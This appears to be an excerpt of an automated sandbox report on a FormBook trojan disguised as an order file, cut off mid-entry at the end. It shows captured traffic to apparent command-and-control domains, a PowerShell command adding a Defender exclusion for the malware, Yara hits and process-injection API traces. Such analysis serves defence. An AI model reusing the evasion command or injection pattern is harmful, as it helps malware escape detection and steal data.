                                                      Jul 3, 2024 17:59:21.734000921 CEST | 1663 | OUT | POST /s0j2/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1249
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.artvectorcraft.store
                                                      Origin: http://www.artvectorcraft.store
                                                      Referer: http://www.artvectorcraft.store/s0j2/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:59:22.353934050 CEST  1236  IN  HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:59:22 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Server: ghs
                                                      Content-Length: 1566
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      Connection: close


                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                      44  192.168.2.6  49774  142.250.74.211  80  6800  C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      Jul 3, 2024 17:59:24.259685993 CEST  353  OUT  GET /s0j2/?OdjTHtuX=BcB93STIeRzesDqYzmgjF/8Aqg2qoGbugvfC7gVQd0Epq+RTfyEF6eLz+ZShIqPWgjFYuR+pkePM3whd8giEyH2988JCuLY+vIFLWxAqbBoWpgzIu1DPnhlaAUBnkOtEvd711RA=&Y6vp=3PLd8j HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.artvectorcraft.store
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:59:24.911488056 CEST  1236  IN  HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:59:24 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Server: ghs
                                                      Content-Length: 1728
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      Connection: close


                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                      45  192.168.2.6  49775  64.190.62.22  80  6800  C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      Jul 3, 2024 17:59:38.291156054 CEST  623  OUT  POST /pv57/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 213
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.hondamechanic.today
                                                      Origin: http://www.hondamechanic.today
                                                      Referer: http://www.hondamechanic.today/pv57/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:59:38.943396091 CEST  305  IN  HTTP/1.1 405 Not Allowed
                                                      date: Wed, 03 Jul 2024 15:59:38 GMT
                                                      content-type: text/html
                                                      content-length: 154
                                                      server: Parking/1.0
                                                      connection: close
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                      46  192.168.2.6  49776  64.190.62.22  80  6800  C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      Jul 3, 2024 17:59:40.822772026 CEST  647  OUT  POST /pv57/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 237
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.hondamechanic.today
                                                      Origin: http://www.hondamechanic.today
                                                      Referer: http://www.hondamechanic.today/pv57/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:59:41.482255936 CEST  305  IN  HTTP/1.1 405 Not Allowed
                                                      date: Wed, 03 Jul 2024 15:59:41 GMT
                                                      content-type: text/html
                                                      content-length: 154
                                                      server: Parking/1.0
                                                      connection: close
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                      47  192.168.2.6  49777  64.190.62.22  80
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      Jul 3, 2024 17:59:43.359024048 CEST  1660  OUT  POST /pv57/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1249
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.hondamechanic.today
                                                      Origin: http://www.hondamechanic.today
                                                      Referer: http://www.hondamechanic.today/pv57/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:59:44.008351088 CEST  305  IN  HTTP/1.1 405 Not Allowed
                                                      date: Wed, 03 Jul 2024 15:59:43 GMT
                                                      content-type: text/html
                                                      content-length: 154
                                                      server: Parking/1.0
                                                      connection: close
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                      48  192.168.2.6  49778  64.190.62.22  80  6800  C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      Jul 3, 2024 17:59:46.190094948 CEST  352  OUT  GET /pv57/?OdjTHtuX=6UcJOPuI3ds3m8dRFaGqe18kk0aRE6C9zfep+6iQQcPKXv8sEJKo1I2dFrwlAwFzKSJLgqMZnt8gW4RLGDqdj2op7I/d7Qwx4DLM/Sb7UzOzABLy3akf6gQBeurdxZRPhPoEffE=&Y6vp=3PLd8j HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.hondamechanic.today
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:59:46.854329109 CEST  1236  IN  HTTP/1.1 200 OK
                                                      date: Wed, 03 Jul 2024 15:59:46 GMT
                                                      content-type: text/html; charset=UTF-8
                                                      transfer-encoding: chunked
                                                      vary: Accept-Encoding
                                                      expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                      cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      pragma: no-cache
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_qqoVxQILHhM7vqTTla2NnDlvZLgsILjKymGnl3FyiYZSz0lW8IaT/+FBNxXOsdHtvZOpNznJpvFDo8KPDJd1CA==
                                                      last-modified: Wed, 03 Jul 2024 15:59:46 GMT
                                                      x-cache-miss-from: parking-64f5d45c5c-jgr6h
                                                      server: Parking/1.0
                                                      connection: close



                                                      Target ID:0
                                                      Start time:11:55:41
                                                      Start date:03/07/2024
                                                      Path:C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"
                                                      Imagebase:0x310000
                                                      File size:990'720 bytes
                                                      MD5 hash:7C33FB31E0B8302EBA116A02E649200B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:11:55:42
                                                      Start date:03/07/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"
                                                      Imagebase:0x7d0000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:11:55:42
                                                      Start date:03/07/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:11:55:42
                                                      Start date:03/07/2024
                                                      Path:C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"
                                                      Imagebase:0x7d0000
                                                      File size:990'720 bytes
                                                      MD5 hash:7C33FB31E0B8302EBA116A02E649200B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2506704352.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2506704352.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2507910619.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2507910619.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:11:56:14
                                                      Start date:03/07/2024
                                                      Path:C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe"
                                                      Imagebase:0x640000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:10
                                                      Start time:11:56:16
                                                      Start date:03/07/2024
                                                      Path:C:\Windows\SysWOW64\compact.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\compact.exe"
                                                      Imagebase:0xc0000
                                                      File size:41'472 bytes
                                                      MD5 hash:5CB107F69062D6D387F4F7A14737220E
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4565204551.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4565204551.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4571364654.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4571364654.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:13
                                                      Start time:11:56:29
                                                      Start date:03/07/2024
                                                      Path:C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe"
                                                      Imagebase:0x640000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4576370278.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4576370278.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:14
                                                      Start time:11:56:40
                                                      Start date:03/07/2024
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff728280000
                                                      File size:676'768 bytes
                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true


                                                        Execution Graph

                                                        Execution Coverage:8.1%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:218
                                                        Total number of Limit Nodes:13

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 00A7D4B6
                                                        • GetCurrentThread.KERNEL32 ref: 00A7D4F3
                                                        • GetCurrentProcess.KERNEL32 ref: 00A7D530
                                                        • GetCurrentThreadId.KERNEL32 ref: 00A7D589

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 00A7D4B6
                                                        • GetCurrentThread.KERNEL32 ref: 00A7D4F3
                                                        • GetCurrentProcess.KERNEL32 ref: 00A7D530
                                                        • GetCurrentThreadId.KERNEL32 ref: 00A7D589
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118601252.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a70000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: 655c3d9bd9bbdbb71a63eb425380ba7f51d3f040204edea6e913a5c22e47e4d1
                                                        • Instruction ID: df7856003942a17134b68bf8d3e03984f8c5af56749785c2117b68f8837fce61
                                                        • Opcode Fuzzy Hash: 655c3d9bd9bbdbb71a63eb425380ba7f51d3f040204edea6e913a5c22e47e4d1
                                                        • Instruction Fuzzy Hash: 305165B0900609DFDB54DFAAD948BAEBBF1FF88304F24C559E109A7390D734A944CB66

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 047C20C6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 38bfa9e6fbe70c5a2827ad86d3d01f8c8cd333284a9d093cb560e997dbfe8ffa
                                                        • Instruction ID: 0912df884a1312cee18e8fa917eef085316d5064ee2a8184c306c50cfd859615
                                                        • Opcode Fuzzy Hash: 38bfa9e6fbe70c5a2827ad86d3d01f8c8cd333284a9d093cb560e997dbfe8ffa
                                                        • Instruction Fuzzy Hash: 49A15871D00219DFEB14DFA8C8817ADBBB2FF48314F1485AEE808A7241DB75A985CF91

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 047C20C6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: d63325acb33b21f169454edd9a0f32d209e192796933e679199315bd249994e7
                                                        • Instruction ID: aa81f95372bb69582d63d700544bd7a7392efdda335999748a7f87f089558321
                                                        • Opcode Fuzzy Hash: d63325acb33b21f169454edd9a0f32d209e192796933e679199315bd249994e7
                                                        • Instruction Fuzzy Hash: 99915971D00219DFEB14DFA8C8417ADBBB2FF48314F1485AEE809A7241DB75A985CF91

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 00A759C9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118601252.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a70000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 067b652dfee06e5f22c3a7648feffad936cf951d91516c8d7ba9a290bc75be8f
                                                        • Instruction ID: 5cc8e5fd3f13a0561bd6c965eb329efaa4396f365000b41420d64e9f27c37d4b
                                                        • Opcode Fuzzy Hash: 067b652dfee06e5f22c3a7648feffad936cf951d91516c8d7ba9a290bc75be8f
                                                        • Instruction Fuzzy Hash: EB41F371C0071DCBEB24CFA9C84479EBBF5BF48304F20856AD518AB251D7B56946CF90

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 00A759C9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118601252.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a70000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 431b2be62eb34e9e288c5e27779ec7612eab882db852aeab0edc153d5be06d07
                                                        • Instruction ID: d3759c5c34c7a375a18385a87584f5b621476578c49275640e7c0548942433eb
                                                        • Opcode Fuzzy Hash: 431b2be62eb34e9e288c5e27779ec7612eab882db852aeab0edc153d5be06d07
                                                        • Instruction Fuzzy Hash: 6041F171C0071DCBEB24CFA9C894BDEBBB5BF88304F20856AD509AB251DBB55946CF50

                                                        Control-flow Graph

                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 047C1C98
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 789750e00eafae1740a2164bee34fbdeb3fd4b08809a0419c635472472a77348
                                                        • Instruction ID: d841228f4cbd228ae21e57d9dbb7376f989aa173cc8bbff8fdfef351d774bc18
                                                        • Opcode Fuzzy Hash: 789750e00eafae1740a2164bee34fbdeb3fd4b08809a0419c635472472a77348
                                                        • Instruction Fuzzy Hash: EE2137B19003599FDB10DFA9C9847EEBBF5FF48310F50842EE919A7241D778A945CBA0

                                                        Control-flow Graph

                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 047C1C98
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 8b423358cd90f37cfaa0dbd9518d9220eb5e48d0b7c56f8c37e7ac138fdddab9
                                                        • Instruction ID: 3ee1b723a207041da044bbed56f8c2686376632253a81a923375b67f87fbecb4
                                                        • Opcode Fuzzy Hash: 8b423358cd90f37cfaa0dbd9518d9220eb5e48d0b7c56f8c37e7ac138fdddab9
                                                        • Instruction Fuzzy Hash: 092126719003199FDB10DFA9C985BEEBBF5FF48310F50882EE919A7241D778A944CBA0

                                                        Control-flow Graph

                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 047C1AEE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 73517e5b27e2def4ec9627ee2f129c69750fec2c5aaf60786068e4a6b08f363e
                                                        • Instruction ID: 5353ff8f70c3113fd00d3a8883852660896df5ccd0a8953269d41f14529bc865
                                                        • Opcode Fuzzy Hash: 73517e5b27e2def4ec9627ee2f129c69750fec2c5aaf60786068e4a6b08f363e
                                                        • Instruction Fuzzy Hash: 5E2143719003098FDB10DFAAC885BAEBBF4EB88320F54842ED559A7341D778A945CFA1

                                                        Control-flow Graph

                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 047C1D78
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 50f314364f798e67404d7ecebc797a04a4b5793f7607b24ae0ba2f84d6c2cb4a
                                                        • Instruction ID: 9c915ae2a26f313cae1fcdcd105634547306d2b9c440e437083e4ddcd10ebfc8
                                                        • Opcode Fuzzy Hash: 50f314364f798e67404d7ecebc797a04a4b5793f7607b24ae0ba2f84d6c2cb4a
                                                        • Instruction Fuzzy Hash: 252122719002499FDB10DFAAC880AEEBBB5FF48310F54842EE919A7251C739A9059BA1

                                                        Control-flow Graph

                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A7D707
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118601252.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a70000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 8cbf8afc5876799a52a3533adbbb4c236857e1dcfaea0392a7e3d4d58abb7fc9
                                                        • Instruction ID: 3b70edfbe3f4ba0f59ec265e7727045f954e3fdfc04c2a3708c6758e288b1455
                                                        • Opcode Fuzzy Hash: 8cbf8afc5876799a52a3533adbbb4c236857e1dcfaea0392a7e3d4d58abb7fc9
                                                        • Instruction Fuzzy Hash: 672105B59002499FDB10CFA9D884AEEBFF5EF48310F24841AE918A3351D374A945CF60

                                                        Control-flow Graph

                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 047C1D78
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: b2a3717ba153cbcf90d41602479a3fc01bf9e725fee51340e4e68014f39e86b6
                                                        • Instruction ID: 9c34f55feff92af03b5f42662cf722b91160163eb389e2d48247af34926b7026
                                                        • Opcode Fuzzy Hash: b2a3717ba153cbcf90d41602479a3fc01bf9e725fee51340e4e68014f39e86b6
                                                        • Instruction Fuzzy Hash: 312114719003499FDB10DFAAD880AEEBBF5FF48310F54842EE519A7250D779A900CBA1

                                                        Control-flow Graph

                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 047C1AEE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 0b7e6a47223f5640cd745550fede686974d40c507b513c3dcd9b9900631e2689
                                                        • Instruction ID: 8c00433432af6ab7bc84fb5785f50728c00fad6400107e94b0d2e734fbd014e9
                                                        • Opcode Fuzzy Hash: 0b7e6a47223f5640cd745550fede686974d40c507b513c3dcd9b9900631e2689
                                                        • Instruction Fuzzy Hash: 552134719003098FDB10DFAAC485BAEBBF4EF88320F54842ED519A7241D778A945CFA1

                                                        Control-flow Graph

                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A7D707
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118601252.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a70000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 4cf559ab94a4a5607410f3ac65fafcb1a77607c27ae9bc1c74dd34cc6bced543
                                                        • Instruction ID: e7c578118609cca31f0f7f31236a4c3a7dc18469418b6576ee5e106d9479bfdb
                                                        • Opcode Fuzzy Hash: 4cf559ab94a4a5607410f3ac65fafcb1a77607c27ae9bc1c74dd34cc6bced543
                                                        • Instruction Fuzzy Hash: 9421C4B5900249DFDB10CFAAD984ADEBBF4FB48310F14841AE918A7350D375A954CFA5

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 047C1BB6
                                                        Memory Dump Source
